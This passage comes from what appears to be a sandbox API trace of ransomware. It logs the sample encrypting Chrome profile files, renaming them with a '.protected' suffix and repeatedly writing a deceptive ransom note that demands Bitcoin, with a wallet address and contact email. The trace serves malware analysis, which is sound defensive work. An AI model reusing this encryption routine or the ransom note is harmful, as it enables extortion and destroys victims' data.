Docs.ico.md5", lpString2="Program Files (x86)") returned -1 [0084.408] lstrcmpiW (lpString1="Google Docs.ico.md5", lpString2="$Recycle.bin") returned 1 [0084.408] lstrcmpiW (lpString1="Google Docs.ico.md5", lpString2="System Volume Information") returned -1 [0084.408] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5") returned 154 [0084.408] StrStrIW (lpFirst="Google Docs.ico.md5", lpSrch=".protected") returned 0x0 [0084.408] lstrcmpW (lpString1="Google Docs.ico.md5", lpString2="RESTORE_FILES.txt") returned -1 [0084.408] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e01c | out: pbBuffer=0x295e01c) returned 1 [0084.408] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e044*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e044*=0x30) returned 1 [0084.408] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.md5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0084.409] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5") returned 154 [0084.409] StrStrW (lpFirst="Google Docs.ico.md5", lpSrch=".txt") returned 0x0 [0084.409] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5") returned 154 [0084.409] StrStrW (lpFirst="Google Docs.ico.md5", lpSrch=".rar") returned 0x0 [0084.409] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5") returned 154 [0084.409] StrStrW (lpFirst="Google Docs.ico.md5", lpSrch=".zip") returned 0x0 [0084.409] ReadFile (in: hFile=0x15c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e064*=0x10, lpOverlapped=0x0) returned 1 [0084.410] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffff0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.410] WriteFile (in: hFile=0x15c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e064*=0x10, lpOverlapped=0x0) returned 1 [0084.410] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.410] WriteFile (in: hFile=0x15c, lpBuffer=0x295e03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x295e03c*, lpNumberOfBytesWritten=0x295e064*=0x4, lpOverlapped=0x0) returned 1 [0084.410] WriteFile (in: hFile=0x15c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e064*=0x30, lpOverlapped=0x0) returned 1 [0084.410] CloseHandle (hObject=0x15c) returned 1 [0084.410] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5.protected") returned 164 [0084.410] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.md5"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.md5.protected")) returned 1 [0084.411] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0084.411] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0084.411] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\RESTORE_FILES.txt") returned 152 [0084.411] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.423] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.423] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0084.424] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.424] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0084.424] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.424] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0084.424] CloseHandle (hObject=0x158) returned 1 [0084.425] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0084.425] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0084.425] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\RESTORE_FILES.txt") returned 114 [0084.425] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.425] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.425] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0084.426] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.426] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0084.426] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.426] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0084.427] CloseHandle (hObject=0x154) returned 1 [0084.427] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.427] lstrcmpiW (lpString1="Web Data", lpString2="Windows") returned -1 [0084.427] lstrcmpiW (lpString1="Web Data", lpString2="Program Files") returned 1 [0084.427] lstrcmpiW (lpString1="Web Data", lpString2="Program Files (x86)") returned 1 [0084.427] lstrcmpiW (lpString1="Web Data", lpString2="$Recycle.bin") returned 1 [0084.427] lstrcmpiW (lpString1="Web Data", lpString2="System Volume Information") returned 1 [0084.427] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 88 [0084.427] StrStrIW (lpFirst="Web Data", lpSrch=".protected") returned 0x0 [0084.427] lstrcmpW (lpString1="Web Data", lpString2="RESTORE_FILES.txt") returned 1 [0084.427] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.427] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.427] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web data"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.428] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 88 [0084.428] StrStrW (lpFirst="Web Data", lpSrch=".txt") returned 0x0 [0084.428] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 88 [0084.428] StrStrW (lpFirst="Web Data", lpSrch=".rar") returned 0x0 [0084.428] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 88 [0084.428] StrStrW (lpFirst="Web Data", lpSrch=".zip") returned 0x0 [0084.428] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.429] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.430] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.431] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.431] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.431] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.431] CloseHandle (hObject=0x154) returned 1 [0084.432] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.protected") returned 98 [0084.432] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web data"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web data.protected")) returned 1 [0084.432] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.432] lstrcmpiW (lpString1="Web Data-journal", lpString2="Windows") returned -1 [0084.432] lstrcmpiW (lpString1="Web Data-journal", lpString2="Program Files") returned 1 [0084.432] lstrcmpiW (lpString1="Web Data-journal", lpString2="Program Files (x86)") returned 1 [0084.432] lstrcmpiW (lpString1="Web Data-journal", lpString2="$Recycle.bin") returned 1 [0084.432] lstrcmpiW (lpString1="Web Data-journal", lpString2="System Volume Information") returned 1 [0084.433] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal") returned 96 [0084.433] StrStrIW (lpFirst="Web Data-journal", lpSrch=".protected") returned 0x0 [0084.433] lstrcmpW (lpString1="Web Data-journal", lpString2="RESTORE_FILES.txt") returned 1 [0084.433] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.433] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.433] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web data-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.433] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal") returned 96 [0084.433] StrStrW (lpFirst="Web Data-journal", lpSrch=".txt") returned 0x0 [0084.433] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal") returned 96 [0084.433] StrStrW (lpFirst="Web Data-journal", lpSrch=".rar") returned 0x0 [0084.433] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal") returned 96 [0084.433] StrStrW (lpFirst="Web Data-journal", lpSrch=".zip") returned 0x0 [0084.433] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.434] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.434] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.434] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.434] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.435] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.435] CloseHandle (hObject=0x154) returned 1 [0084.436] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal.protected") returned 106 [0084.436] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web data-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web data-journal.protected")) returned 1 [0084.437] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.437] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.438] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\RESTORE_FILES.txt") returned 97 [0084.438] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.438] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.439] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.439] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.439] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0084.439] lstrlenA 